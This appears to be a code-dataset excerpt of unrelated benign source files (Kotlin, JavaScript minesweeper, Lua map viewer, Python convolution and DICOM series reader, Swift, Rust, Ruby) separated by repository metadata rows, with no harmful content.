OP_ARG_PUSHO.code,
OP_ARG_PUSHS.code,
-> {
if (pos == 0) {
return Pair(ValueSet.all(), instruction)
} else {
pos--
}
}
}
}
val values = ValueSet.empty()
var instruction: Instruction? = null
var multipleInstructions = false
path.add(block)
for (from in block.from) {
// Bail out from loops.
if (from in path) {
return Pair(ValueSet.all(), null)
}
val (fromValues, fromInstruction) = find(LinkedHashSet(path), cfg, from, from.end, pos)
values.union(fromValues)
if (!multipleInstructions) {
if (instruction == null) {
instruction = fromInstruction
} else if (instruction != fromInstruction) {
instruction = null
multipleInstructions = true
}
}
}
return Pair(values, instruction)
}
}
| 29.3125 | 99 | 0.472548 | 3.21875 |
e73edfde7f67f674b761d7588194ef86d54d8b46 | 2,258 | js | JavaScript | src/game/models/tile.js | aldhsu/minesweeper | adaa9bc74b53dbe4697e2bf228faabf973eb093d | [
"CC0-1.0"
] | null | null | null | src/game/models/tile.js | aldhsu/minesweeper | adaa9bc74b53dbe4697e2bf228faabf973eb093d | [
"CC0-1.0"
] | null | null | null | src/game/models/tile.js | aldhsu/minesweeper | adaa9bc74b53dbe4697e2bf228faabf973eb093d | [
"CC0-1.0"
] | null | null | null | import _ from 'underscore';
export default class Tile {
constructor(y, x, board, channel) {
this.x = x;
this.y = y;
this.board = board;
this.revealed = false;
this.isBomb = false;
this.channel = channel;
this.isFlagged = false;
}
get isRevealed() {
return this.revealed;
}
get hasBomb() {
return this.isBomb;
}
becomeBomb() {
this.isBomb = true;
return this;
}
get bombCount() {
const value = this.neighbours.reduce((acc, tile) => {
return acc + tile.hasBomb;
}, 0);
return value;
}
reveal() {
this.revealed = true;
if (this.bombCount === 0) {
this.neighbours
.filter((tile) => {
return !tile.revealed && !tile.isBomb
}).forEach((tile) => {
tile.reveal();
});
}
this.channel.emit('reveal');
return true;
}
flag() {
this.isFlagged = true;
this.channel.emit('reveal');
}
// related positions
get topLeft() {
return this.safePositionCheck([this.y - 1, this.x - 1])
}
get topMiddle() {
return this.safePositionCheck([this.y - 1, this.x])
}
get topRight() {
return this.safePositionCheck([this.y - 1, this.x + 1])
}
get left() {
return this.safePositionCheck([this.y, this.x - 1])
}
get right() {
return this.safePositionCheck([this.y, this.x + 1])
}
get bottomLeft() {
return this.safePositionCheck([this.y + 1, this.x - 1])
}
get bottomMiddle() {
return this.safePositionCheck([this.y + 1, this.x])
}
get bottomRight() {
return this.safePositionCheck([this.y + 1, this.x + 1])
}
safePositionCheck(offsets) {
const [yOffset, xOffset] = offsets;
const offGrid = ((xOffset) < 0 || (yOffset) < 0) || (xOffset > this.board.length - 1 || yOffset > this.board.length - 1)
if(offGrid) {
return;
} else {
return this.board[yOffset][xOffset]
}
}
get neighbours() {
const neighbours = [];
for (var y = -1; y <= 1; y++) {
for (var x = -1; x <= 1; x++) {
if (y === 0 && x === 0) {
continue;
} else {
neighbours.push(this.safePositionCheck([this.y + y, this.x + x]));
}
}
}
return _.compact(neighbours);
}
}
| 19.807018 | 124 | 0.550487 | 3.171875 |
ad44640a5702e5628a875fa2bd0cf737563647a8 | 2,336 | lua | Lua | src/mod/tools/api/MapViewer.lua | Ruin0x11/OpenNefia | 548f1a1442eca704bb1c16b1a1591d982a34919f | [
"MIT"
] | 109 | 2020-04-07T16:56:38.000Z | 2022-02-17T04:05:40.000Z | src/mod/tools/api/MapViewer.lua | Ruin0x11/OpenNefia | 548f1a1442eca704bb1c16b1a1591d982a34919f | [
"MIT"
] | 243 | 2020-04-07T08:25:15.000Z | 2021-10-30T07:22:10.000Z | src/mod/tools/api/MapViewer.lua | Ruin0x11/OpenNefia | 548f1a1442eca704bb1c16b1a1591d982a34919f | [
"MIT"
] | 15 | 2020-04-25T12:28:55.000Z | 2022-02-23T03:20:43.000Z | local Draw = require("api.Draw")
local Gui = require("api.Gui")
local InstancedMap = require("api.InstancedMap")
local MapRenderer = require("api.gui.MapRenderer")
local IUiLayer = require("api.gui.IUiLayer")
local IInput = require("api.gui.IInput")
local InputHandler = require("api.gui.InputHandler")
local MapViewer = class.class("MapViewer", IUiLayer)
MapViewer:delegate("input", IInput)
function MapViewer:init(map)
class.assert_is_an(InstancedMap, map)
self.map = map
map:iter_tiles():each(function(x, y) map:memorize_tile(x, y) end)
map:redraw_all_tiles()
self.renderer = MapRenderer:new(map)
local tw, th = Draw.get_coords():get_size()
local mw = self.map:width() * tw
local mh = self.map:height() * th
self.offset_x = math.floor((Draw.get_width() - mw) / 2)
self.offset_y = math.floor((Draw.get_height() - mh) / 2)
self.delta = math.floor(tw / 2)
self.input = InputHandler:new()
self.input:bind_keys(self:make_keymap())
end
function MapViewer:default_z_order()
return 100000000
end
function MapViewer:make_keymap()
return {
north = function() self:pan(0, -self.delta) end,
south = function() self:pan(0, self.delta) end,
east = function() self:pan(self.delta, 0) end,
west = function() self:pan(-self.delta, 0) end,
cancel = function() self.canceled = true end,
escape = function() self.canceled = true end,
enter = function() self.canceled = true end,
}
end
function MapViewer:on_query()
Gui.play_sound("base.pop2")
end
function MapViewer:pan(dx, dy)
self.offset_x = math.floor(self.offset_x + dx)
self.offset_y = math.floor(self.offset_y + dy)
end
function MapViewer:relayout(x, y, width, height)
self.x = x
self.y = y
self.width = width
self.height = height
self.renderer:relayout(self.x, self.y, self.width, self.height)
end
function MapViewer:draw()
local x = self.x + self.offset_x
local y = self.y + self.offset_y
self.renderer.x = x
self.renderer.y = y
Draw.set_color(255, 255, 255)
self.renderer:draw()
end
function MapViewer:update(dt)
self.renderer:update(dt)
local canceled = self.canceled
self.canceled = nil
if canceled then
return nil, "canceled"
end
end
function MapViewer.start(map)
MapViewer:new(map):query()
end
return MapViewer
| 24.333333 | 68 | 0.686644 | 3.25 |
0ce87ae6e8e21068ebe0de253baf4eb583ece22f | 701 | py | Python | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | import numpy as np
def convolucion(Ioriginal, kernel):
'''Método encargado de realizar una convolución a una imagen
Entrada:
Ioriginal - imagen original en forma de matríz
kernel - kernel para barrer la imagen
Salida:
res - imagen resultante'''
#fr - filas, cr - columnas
fr = len(Ioriginal)-(len(kernel)-1)
cr = len(Ioriginal[0])-(len(kernel[0])-1)
res = np.zeros((fr, cr))
#filas, matríz resultado
for i in range(len(res)):
#columnas, matríz resultado
for j in range(len(res[0])):
suma = 0
#filas, kernel
for m in range(len(kernel)):
#columnas, kernel
for n in range(len(kernel[0])):
suma += kernel[m][n] * Ioriginal[m+i][n+j]
res[i][j] = suma
return res | 26.961538 | 61 | 0.664765 | 3.171875 |
75c6fcc4bc86bebf74b9fc4302553cb213042dfa | 3,108 | swift | Swift | src/JetLib/JetLib/Core/Command/ActionCommand.swift | TrueShirshov/ios_swift_utils | a72c43d4fb9db6f34616b88ab7acc786af0bc6d6 | [
"MIT"
] | 7 | 2018-10-01T12:17:10.000Z | 2020-11-07T10:34:17.000Z | src/JetLib/JetLib/Core/Command/ActionCommand.swift | TrueShirshov/ios_swift_utils | a72c43d4fb9db6f34616b88ab7acc786af0bc6d6 | [
"MIT"
] | null | null | null | src/JetLib/JetLib/Core/Command/ActionCommand.swift | TrueShirshov/ios_swift_utils | a72c43d4fb9db6f34616b88ab7acc786af0bc6d6 | [
"MIT"
] | 1 | 2019-08-28T19:18:29.000Z | 2019-08-28T19:18:29.000Z | //
// Created on 27/07/2018
// Copyright © Vladimir Benkevich 2018
//
import Foundation
@available(*, deprecated, message: "Use CommandFactory instead")
open class ActionCommand: SerialCommand {
private let execute: (Any?) -> Void
private let canExecute: ((Any?) -> Bool)?
public init(execute: @escaping () -> Void) {
self.execute = { _ in execute() }
self.canExecute = nil
}
public init(execute: @escaping () -> Void, canExecute: @escaping () -> Bool) {
self.execute = { _ in execute() }
self.canExecute = { _ in canExecute() }
}
public init<T>(execute: @escaping (T) -> Void) {
self.execute = {
execute($0 as! T)
}
self.canExecute = {
return $0 is T
}
}
public init<T>(execute: @escaping (T) -> Void, canExecute: @escaping (T) -> Bool) {
self.execute = { execute($0 as! T) }
self.canExecute = { $0 is T && canExecute($0 as! T) }
}
open var executeQueue: DispatchQueue = DispatchQueue.main
open override func executeImpl(parameter: Any?) -> DispatchWorkItem {
let workItem = DispatchWorkItem {
self.execute(parameter)
}
defer {
executeQueue.async(execute: workItem)
}
return workItem
}
open override func canExecuteImpl(parameter: Any?) -> Bool {
return self.canExecute?(parameter) != false
}
}
public extension ActionCommand {
convenience init<Source: AnyObject>(
_ source: Source,
execute: @escaping (Source) -> Void,
canExecute: @escaping (Source) -> Bool)
{
self.init(
execute: { [weak source] in
if let src = source {
execute(src)
}
},
canExecute: { [weak source] in
if let src = source {
return canExecute(src)
} else {
return false
}
}
)
}
convenience init<Source: AnyObject, TParam>(
_ source: Source,
executeGeneric: @escaping (Source, TParam) -> Void,
canExecute: @escaping (Source, TParam) -> Bool)
{
self.init(
execute: { [weak source] (param: TParam) in
if let src = source {
executeGeneric(src, param)
}
},
canExecute: { [weak source] (param: TParam) in
if let src = source {
return canExecute(src, param)
} else {
return false
}
}
)
}
convenience init<Source: AnyObject>(_ source: Source, execute: @escaping (Source) -> Void) {
self.init(source, execute: { execute($0) }, canExecute: { _ in return true } )
}
convenience init<Source: AnyObject, Param>(_ source: Source, execute: @escaping (Source, Param) -> Void) {
self.init(source, executeGeneric: { execute($0, $1) }, canExecute: { (_, _) in return true } )
}
}
| 28.513761 | 110 | 0.52027 | 3 |
21b0efa986efb538633538be931b8baed7abf5e5 | 1,006 | rs | Rust | bin/xcm-tools/src/cli.rs | stakedtechnologies/Neon | d7719ff137227caa590d5e4096abc5ed850e0b60 | [
"Apache-2.0"
] | 1 | 2019-03-25T06:43:56.000Z | 2019-03-25T06:43:56.000Z | bin/xcm-tools/src/cli.rs | stakedtechnologies/Neon | d7719ff137227caa590d5e4096abc5ed850e0b60 | [
"Apache-2.0"
] | null | null | null | bin/xcm-tools/src/cli.rs | stakedtechnologies/Neon | d7719ff137227caa590d5e4096abc5ed850e0b60 | [
"Apache-2.0"
] | null | null | null | /// Astar XCM tools.
#[derive(Debug, clap::Parser)]
#[clap(subcommand_required = true)]
pub struct Cli {
/// Possible subcommand with parameters.
#[clap(subcommand)]
pub subcommand: Option<Subcommand>,
}
/// Possible subcommands of the main binary.
#[derive(Debug, clap::Subcommand)]
pub enum Subcommand {
/// Prints parachain AccountId.
ParachainAccount(ParachainAccountCmd),
/// Prints AssetId for desired parachain asset.
AssetId(AssetIdCmd),
}
/// Helper that prints AccountId of parachain.
#[derive(Debug, clap::Parser)]
pub struct ParachainAccountCmd {
/// Print address for sibling parachain [child by default].
#[clap(short)]
pub sibling: bool,
/// Target ParaId.
pub parachain_id: u32,
}
/// Helper that prints AssetId for sibling parachain asset.
#[derive(Debug, clap::Parser)]
pub struct AssetIdCmd {
/// External AssetId [relay by default].
#[clap(default_value = "340282366920938463463374607431768211455")]
pub asset_id: u128,
}
| 27.189189 | 70 | 0.702783 | 3 |
1821f3b96a5935c203b3edf6a44aabdd1c70fb05 | 1,070 | rb | Ruby | gem/spec/lib/core/threading_spec.rb | floere/gosu_extensions | f2432fdaae277294b4b3b751f326fad1843ef335 | [
"MIT"
] | 1 | 2015-08-16T19:06:27.000Z | 2015-08-16T19:06:27.000Z | gem/spec/lib/core/threading_spec.rb | floere/gosu_extensions | f2432fdaae277294b4b3b751f326fad1843ef335 | [
"MIT"
] | null | null | null | gem/spec/lib/core/threading_spec.rb | floere/gosu_extensions | f2432fdaae277294b4b3b751f326fad1843ef335 | [
"MIT"
] | null | null | null | require File.join(File.dirname(__FILE__), '/../../spec_helper')
describe Threading do
before(:each) do
@window = stub :window, :things => []
@threaded = test_class_with(Threading).new @window
end
describe "sometimes" do
it "should only call the block's content every x times" do
@threaded.stub! :threaded => nil
@threaded.sometimes(:some_id, :some_time) { :some_result }.should == :some_result
@threaded.sometimes(:some_id, :some_time) { :some_result }.should == nil
@threaded.instance_variable_set(:'@__sometimes_some_id', false)
@threaded.sometimes(:some_id, :some_time) { :some_result }.should == :some_result
end
end
describe "threaded" do
before(:each) do
@scheduling = stub :scheduling
@window.stub! :scheduling => @scheduling
end
it "should delegate to the window's scheduling" do
some_block = lambda {}
@scheduling.should_receive(:add).once.with :some_time, &some_block
@threaded.threaded :some_time, &some_block
end
end
end | 30.571429 | 87 | 0.657944 | 3.015625 |
330f0c3baa6b73293fcd4fabbaa5457656f166bd | 22,550 | py | Python | pydicom_ext/pydicom_series.py | shinaji/pydicom_ext | bc3d716eb488589ba5906a0722474682987dafb8 | [
"MIT"
] | null | null | null | pydicom_ext/pydicom_series.py | shinaji/pydicom_ext | bc3d716eb488589ba5906a0722474682987dafb8 | [
"MIT"
] | null | null | null | pydicom_ext/pydicom_series.py | shinaji/pydicom_ext | bc3d716eb488589ba5906a0722474682987dafb8 | [
"MIT"
] | null | null | null | # dicom_series.py
"""
By calling the function read_files with a directory name or list
of files as an argument, a list of DicomSeries instances can be
obtained. A DicomSeries object has some attributes that give
information about the serie (such as shape, sampling, suid) and
has an info attribute, which is a pydicom.DataSet instance containing
information about the first dicom file in the serie. The data can
be obtained using the get_pixel_array() method, which produces a
3D numpy array if there a multiple files in the serie.
This module can deal with gated data, in which case a DicomSeries
instance is created for each 3D volume.
"""
from __future__ import print_function
#
# Copyright (c) 2010 Almar Klein
# This file is released under the pydicom license.
# See the file LICENSE included with the pydicom distribution, also
# available at https://github.com/pydicom/pydicom
#
# I (Almar) performed some test to loading a series of data
# in two different ways: loading all data, and deferring loading
# the data. Both ways seem equally fast on my system. I have to
# note that results can differ quite a lot depending on the system,
# but still I think this suggests that deferred reading is in
# general not slower. I think deferred loading of the pixel data
# can be advantageous because maybe not all data of all series
# is needed. Also it simply saves memory, because the data is
# removed from the Dataset instances.
# In the few result below, cold means reading for the first time,
# warm means reading 2nd/3d/etc time.
# - Full loading of data, cold: 9 sec
# - Full loading of data, warm: 3 sec
# - Deferred loading of data, cold: 9 sec
# - Deferred loading of data, warm: 3 sec
import os
import time
import gc
import pydicom
from pydicom.sequence import Sequence
from pydicom import compat
# Try importing numpy
try:
import numpy as np
have_numpy = True
except ImportError:
np = None # NOQA
have_numpy = False
# Helper functions and classes
class ProgressBar(object):
""" To print progress to the screen.
"""
def __init__(self, char='-', length=20):
self.char = char
self.length = length
self.progress = 0.0
self.nbits = 0
self.what = ''
def Start(self, what=''):
""" Start(what='')
Start the progress bar, displaying the given text first.
Make sure not to print anything untill after calling
Finish(). Messages can be printed while displaying
progess by using printMessage().
"""
self.what = what
self.progress = 0.0
self.nbits = 0
sys.stdout.write(what + " [")
def Stop(self, message=""):
""" Stop the progress bar where it is now.
Optionally print a message behind it."""
delta = int(self.length - self.nbits)
sys.stdout.write(" " * delta + "] " + message + "\n")
def Finish(self, message=""):
""" Finish the progress bar, setting it to 100% if it
was not already. Optionally print a message behind the bar.
"""
delta = int(self.length - self.nbits)
sys.stdout.write(self.char * delta + "] " + message + "\n")
def Update(self, newProgress):
""" Update progress. Progress is given as a number
between 0 and 1.
"""
self.progress = newProgress
required = self.length * (newProgress)
delta = int(required - self.nbits)
if delta > 0:
sys.stdout.write(self.char * delta)
self.nbits += delta
def PrintMessage(self, message):
""" Print a message (for example a warning).
The message is printed behind the progress bar,
and a new bar is started.
"""
self.Stop(message)
self.Start(self.what)
def _dummyProgressCallback(progress):
""" A callback to indicate progress that does nothing. """
pass
_progressBar = ProgressBar()
def _progressCallback(progress):
""" The default callback for displaying progress. """
if isinstance(progress, compat.string_types):
_progressBar.Start(progress)
_progressBar._t0 = time.time()
elif progress is None:
dt = time.time() - _progressBar._t0
_progressBar.Finish('%2.2f seconds' % dt)
else:
_progressBar.Update(progress)
def _listFiles(files, path):
"""List all files in the directory, recursively. """
for item in os.listdir(path):
item = os.path.join(path, item)
if os.path.isdir(item):
_listFiles(files, item)
else:
files.append(item)
def _splitSerieIfRequired(serie, series):
""" _splitSerieIfRequired(serie, series)
Split the serie in multiple series if this is required.
The choice is based on examing the image position relative to
the previous image. If it differs too much, it is assumed
that there is a new dataset. This can happen for example in
unspitted gated CT data.
"""
# Sort the original list and get local name
serie._sort()
L = serie._datasets
# Init previous slice
ds1 = L[0]
# Check whether we can do this
if "ImagePositionPatient" not in ds1:
return
# Initialize a list of new lists
L2 = [[ds1]]
# Init slice distance estimate
distance = 0
for index in range(1, len(L)):
# Get current slice
ds2 = L[index]
# Get positions
pos1 = float(ds1.ImagePositionPatient[2])
pos2 = float(ds2.ImagePositionPatient[2])
# Get distances
newDist = abs(pos1 - pos2)
# deltaDist = abs(firstPos-pos2)
# If the distance deviates more than 2x from what we've seen,
# we can agree it's a new dataset.
if distance and newDist > 2.1 * distance:
L2.append([])
distance = 0
else:
# Test missing file
if distance and newDist > 1.5 * distance:
print('Warning: missing file after "%s"' % ds1.filename)
distance = newDist
# Add to last list
L2[-1].append(ds2)
# Store previous
ds1 = ds2
# Split if we should
if len(L2) > 1:
# At what position are we now?
i = series.index(serie)
# Create new series
series2insert = []
for L in L2:
newSerie = DicomSeries(serie.suid, serie._showProgress)
newSerie._datasets = Sequence(L)
series2insert.append(newSerie)
# Insert series and remove self
for newSerie in reversed(series2insert):
series.insert(i, newSerie)
series.remove(serie)
pixelDataTag = pydicom.tag.Tag(0x7fe0, 0x0010)
def _getPixelDataFromDataset(ds):
""" Get the pixel data from the given dataset. If the data
was deferred, make it deferred again, so that memory is
preserved. Also applies RescaleSlope and RescaleIntercept
if available. """
# Get original element
el = dict.__getitem__(ds, pixelDataTag)
# Get data
data = np.array(ds.pixel_array)
# Remove data (mark as deferred)
dict.__setitem__(ds, pixelDataTag, el)
del ds._pixel_array
# Obtain slope and offset
slope = 1
offset = 0
needFloats = False
needApplySlopeOffset = False
if 'RescaleSlope' in ds:
needApplySlopeOffset = True
slope = ds.RescaleSlope
if 'RescaleIntercept' in ds:
needApplySlopeOffset = True
offset = ds.RescaleIntercept
if int(slope) != slope or int(offset) != offset:
needFloats = True
if not needFloats:
slope, offset = int(slope), int(offset)
# Apply slope and offset
if needApplySlopeOffset:
# Maybe we need to change the datatype?
if data.dtype in [np.float32, np.float64]:
pass
elif needFloats:
data = data.astype(np.float32)
else:
# Determine required range
minReq, maxReq = data.min(), data.max()
minReq = min(
[minReq, minReq * slope + offset, maxReq * slope + offset])
maxReq = max(
[maxReq, minReq * slope + offset, maxReq * slope + offset])
# Determine required datatype from that
dtype = None
if minReq < 0:
# Signed integer type
maxReq = max([-minReq, maxReq])
if maxReq < 2**7:
dtype = np.int8
elif maxReq < 2**15:
dtype = np.int16
elif maxReq < 2**31:
dtype = np.int32
else:
dtype = np.float32
else:
# Unsigned integer type
if maxReq < 2**8:
dtype = np.uint8
elif maxReq < 2**16:
dtype = np.uint16
elif maxReq < 2**32:
dtype = np.uint32
else:
dtype = np.float32
# Change datatype
if dtype != data.dtype:
data = data.astype(dtype)
# Apply slope and offset
data *= slope
data += offset
# Done
return data
# The public functions and classes
def read_files(path, showProgress=False, readPixelData=False, force=False):
""" read_files(path, showProgress=False, readPixelData=False)
Reads dicom files and returns a list of DicomSeries objects, which
contain information about the data, and can be used to load the
image or volume data.
The parameter "path" can also be a list of files or directories.
If the callable "showProgress" is given, it is called with a single
argument to indicate the progress. The argument is a string when a
progress is started (indicating what is processed). A float indicates
progress updates. The paremeter is None when the progress is finished.
When "showProgress" is True, a default callback is used that writes
to stdout. By default, no progress is shown.
if readPixelData is True, the pixel data of all series is read. By
default the loading of pixeldata is deferred until it is requested
using the DicomSeries.get_pixel_array() method. In general, both
methods should be equally fast.
"""
# Init list of files
files = []
# Obtain data from the given path
if isinstance(path, compat.string_types):
# Make dir nice
basedir = os.path.abspath(path)
# Check whether it exists
if not os.path.isdir(basedir):
raise ValueError('The given path is not a valid directory.')
# Find files recursively
_listFiles(files, basedir)
elif isinstance(path, (tuple, list)):
# Iterate over all elements, which can be files or directories
for p in path:
if os.path.isdir(p):
_listFiles(files, os.path.abspath(p))
elif os.path.isfile(p):
files.append(p)
else:
print("Warning, the path '%s' is not valid." % p)
else:
raise ValueError('The path argument must be a string or list.')
# Set default progress callback?
if showProgress is True:
showProgress = _progressCallback
if not hasattr(showProgress, '__call__'):
showProgress = _dummyProgressCallback
# Set defer size
deferSize = 16383 # 128**2-1
if readPixelData:
deferSize = None
# Gather file data and put in DicomSeries
series = {}
count = 0
showProgress('Loading series information:')
for filename in files:
# Skip DICOMDIR files
if filename.count("DICOMDIR"):
continue
# Try loading dicom ...
try:
dcm = pydicom.read_file(filename, deferSize, force=force)
except pydicom.filereader.InvalidDicomError:
continue # skip non-dicom file
except Exception as why:
if showProgress is _progressCallback:
_progressBar.PrintMessage(str(why))
else:
print('Warning:', why)
continue
# Get SUID and register the file with an existing or new series object
try:
suid = dcm.SeriesInstanceUID
except AttributeError:
continue # some other kind of dicom file
if suid not in series:
series[suid] = DicomSeries(suid, showProgress)
series[suid]._append(dcm)
# Show progress (note that we always start with a 0.0)
showProgress(float(count) / len(files))
count += 1
# Finish progress
showProgress(None)
# Make a list and sort, so that the order is deterministic
series = list(series.values())
series.sort(key=lambda x: x.suid)
# Split series if necessary
for serie in reversed([serie for serie in series]):
_splitSerieIfRequired(serie, series)
# Finish all series
showProgress('Analysing series')
series_ = []
for i in range(len(series)):
try:
series[i]._finish()
series_.append(series[i])
except Exception:
pass # Skip serie (probably report-like file without pixels)
showProgress(float(i + 1) / len(series))
showProgress(None)
return series_
class DicomSeries(object):
""" DicomSeries
This class represents a serie of dicom files that belong together.
If these are multiple files, they represent the slices of a volume
(like for CT or MRI). The actual volume can be obtained using loadData().
Information about the data can be obtained using the info attribute.
"""
# To create a DicomSeries object, start by making an instance and
# append files using the "_append" method. When all files are
# added, call "_sort" to sort the files, and then "_finish" to evaluate
# the data, perform some checks, and set the shape and sampling
# attributes of the instance.
def __init__(self, suid, showProgress):
# Init dataset list and the callback
self._datasets = Sequence()
self._showProgress = showProgress
# Init props
self._suid = suid
self._info = None
self._shape = None
self._sampling = None
@property
def suid(self):
""" The Series Instance UID. """
return self._suid
@property
def shape(self):
""" The shape of the data (nz, ny, nx).
If None, the serie contains a single dicom file. """
return self._shape
@property
def sampling(self):
""" The sampling (voxel distances) of the data (dz, dy, dx).
If None, the serie contains a single dicom file. """
return self._sampling
@property
def info(self):
""" A DataSet instance containing the information as present in the
first dicomfile of this serie. """
return self._info
@property
def description(self):
""" A description of the dicom series. Used fields are
PatientName, shape of the data, SeriesDescription,
and ImageComments.
"""
info = self.info
# If no info available, return simple description
if info is None:
return "DicomSeries containing %i images" % len(self._datasets)
fields = []
# Give patient name
if 'PatientName' in info:
fields.append("" + info.PatientName)
# Also add dimensions
if self.shape:
tmp = [str(d) for d in self.shape]
fields.append('x'.join(tmp))
# Try adding more fields
if 'SeriesDescription' in info:
fields.append("'" + info.SeriesDescription + "'")
if 'ImageComments' in info:
fields.append("'" + info.ImageComments + "'")
# Combine
return ' '.join(fields)
def __repr__(self):
adr = hex(id(self)).upper()
data_len = len(self._datasets)
return "<DicomSeries with %i images at %s>" % (data_len, adr)
def get_pixel_array(self):
""" get_pixel_array()
Get (load) the data that this DicomSeries represents, and return
it as a numpy array. If this serie contains multiple images, the
resulting array is 3D, otherwise it's 2D.
If RescaleSlope and RescaleIntercept are present in the dicom info,
the data is rescaled using these parameters. The data type is chosen
depending on the range of the (rescaled) data.
"""
# Can we do this?
if not have_numpy:
msg = "The Numpy package is required to use get_pixel_array.\n"
raise ImportError(msg)
# It's easy if no file or if just a single file
if len(self._datasets) == 0:
raise ValueError('Serie does not contain any files.')
elif len(self._datasets) == 1:
ds = self._datasets[0]
slice = _getPixelDataFromDataset(ds)
return slice
# Check info
if self.info is None:
raise RuntimeError("Cannot return volume if series not finished.")
# Set callback to update progress
showProgress = self._showProgress
# Init data (using what the dicom packaged produces as a reference)
ds = self._datasets[0]
slice = _getPixelDataFromDataset(ds)
# vol = Aarray(self.shape, self.sampling, fill=0, dtype=slice.dtype)
vol = np.zeros(self.shape, dtype=slice.dtype)
vol[0] = slice
# Fill volume
showProgress('Loading data:')
ll = self.shape[0]
for z in range(1, ll):
ds = self._datasets[z]
vol[z] = _getPixelDataFromDataset(ds)
showProgress(float(z) / ll)
# Finish
showProgress(None)
# Done
gc.collect()
return vol
def _append(self, dcm):
""" _append(dcm)
Append a dicomfile (as a pydicom.dataset.FileDataset) to the series.
"""
self._datasets.append(dcm)
def _sort(self):
""" sort()
Sort the datasets by instance number.
"""
self._datasets._list.sort(key=lambda k: k.InstanceNumber)
def _finish(self):
""" _finish()
Evaluate the series of dicom files. Together they should make up
a volumetric dataset. This means the files should meet certain
conditions. Also some additional information has to be calculated,
such as the distance between the slices. This method sets the
attributes for "shape", "sampling" and "info".
This method checks:
* that there are no missing files
* that the dimensions of all images match
* that the pixel spacing of all images match
"""
# The datasets list should be sorted by instance number
L = self._datasets
if len(L) == 0:
return
elif len(L) < 2:
# Set attributes
ds = self._datasets[0]
self._info = self._datasets[0]
self._shape = [ds.Rows, ds.Columns]
self._sampling = [
float(ds.PixelSpacing[0]), float(ds.PixelSpacing[1])
]
return
# Get previous
ds1 = L[0]
# Init measures to calculate average of
distance_sum = 0.0
# Init measures to check (these are in 2D)
dimensions = ds1.Rows, ds1.Columns
# row, column
sampling = float(ds1.PixelSpacing[0]), float(ds1.PixelSpacing[1])
for index in range(len(L)):
# The first round ds1 and ds2 will be the same, for the
# distance calculation this does not matter
# Get current
ds2 = L[index]
# Get positions
pos1 = float(ds1.ImagePositionPatient[2])
pos2 = float(ds2.ImagePositionPatient[2])
# Update distance_sum to calculate distance later
distance_sum += abs(pos1 - pos2)
# Test measures
dimensions2 = ds2.Rows, ds2.Columns
sampling2 = float(ds2.PixelSpacing[0]), float(ds2.PixelSpacing[1])
if dimensions != dimensions2:
# We cannot produce a volume if the dimensions match
raise ValueError('Dimensions of slices does not match.')
if sampling != sampling2:
# We can still produce a volume, but we should notify the user
msg = 'Warning: sampling does not match.'
if self._showProgress is _progressCallback:
_progressBar.PrintMessage(msg)
else:
print(msg)
# Store previous
ds1 = ds2
# Create new dataset by making a deep copy of the first
info = pydicom.dataset.Dataset()
firstDs = self._datasets[0]
for key in firstDs.keys():
if key != (0x7fe0, 0x0010):
el = firstDs[key]
info.add_new(el.tag, el.VR, el.value)
# Finish calculating average distance
# (Note that there are len(L)-1 distances)
distance_mean = distance_sum / (len(L) - 1)
# Store information that is specific for the serie
self._shape = [len(L), ds2.Rows, ds2.Columns]
self._sampling = [distance_mean, float(ds2.PixelSpacing[0]),
float(ds2.PixelSpacing[1])]
# Store
self._info = info
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print("Expected a single argument: a directory with dicom files in it")
else:
adir = sys.argv[1]
t0 = time.time()
all_series = read_files(adir, None, False)
print("Summary of each series:")
for series in all_series:
print(series.description)
| 32.823872 | 80 | 0.587095 | 3.125 |
a70f4bfdf6e56a2d004b9b30fc713c8e183a22d4 | 1,770 | swift | Swift | Carthage/Checkouts/ReactiveCocoa/Carthage/Checkouts/ReactiveSwift/Sources/Observers/Throttle.swift | arcangelw/ReactiveAutomaton | e2876b876ac3ba79f0ca797d04567e8469b3c2bb | [
"MIT"
] | 3,078 | 2016-09-11T01:54:26.000Z | 2022-03-25T09:38:59.000Z | Carthage/Checkouts/ReactiveCocoa/Carthage/Checkouts/ReactiveSwift/Sources/Observers/Throttle.swift | arcangelw/ReactiveAutomaton | e2876b876ac3ba79f0ca797d04567e8469b3c2bb | [
"MIT"
] | 602 | 2016-09-11T12:12:29.000Z | 2022-03-30T14:45:06.000Z | Sources/Observers/Throttle.swift | isabella232/ReactiveSwift | efb2f0a6f6c8739cce8fb14148a5bd3c83f2f91d | [
"MIT"
] | 565 | 2016-09-11T07:04:27.000Z | 2022-03-16T19:57:51.000Z | import Foundation
extension Operators {
internal final class Throttle<Value, Error: Swift.Error>: UnaryAsyncOperator<Value, Value, Error> {
let interval: TimeInterval
let targetWithClock: DateScheduler
private let state: Atomic<ThrottleState<Value>> = Atomic(ThrottleState())
private let schedulerDisposable = SerialDisposable()
init(
downstream: Observer<Value, Error>,
downstreamLifetime: Lifetime,
target: DateScheduler,
interval: TimeInterval
) {
precondition(interval >= 0)
self.interval = interval
self.targetWithClock = target
super.init(downstream: downstream, downstreamLifetime: downstreamLifetime, target: target)
downstreamLifetime += schedulerDisposable
}
override func receive(_ value: Value) {
let scheduleDate: Date = state.modify { state in
state.pendingValue = value
let proposedScheduleDate: Date
if let previousDate = state.previousDate, previousDate <= targetWithClock.currentDate {
proposedScheduleDate = previousDate.addingTimeInterval(interval)
} else {
proposedScheduleDate = targetWithClock.currentDate
}
return proposedScheduleDate < targetWithClock.currentDate ? targetWithClock.currentDate : proposedScheduleDate
}
schedulerDisposable.inner = targetWithClock.schedule(after: scheduleDate) {
guard self.isActive else { return }
if let pendingValue = self.state.modify({ $0.retrieveValue(date: scheduleDate) }) {
self.unscheduledSend(pendingValue)
}
}
}
}
}
private struct ThrottleState<Value> {
var previousDate: Date?
var pendingValue: Value?
mutating func retrieveValue(date: Date) -> Value? {
defer {
if pendingValue != nil {
pendingValue = nil
previousDate = date
}
}
return pendingValue
}
}
| 27.230769 | 114 | 0.736723 | 3.078125 |
71e243140310dbc868442ebb0c4493d5cf29492e | 2,707 | sql | SQL | procedures/saveServantInfo.sql | sir-nutty/myChaldea-DB | 796d9f76d7dd64eff2923c92f0031589573d9c60 | [
"MIT"
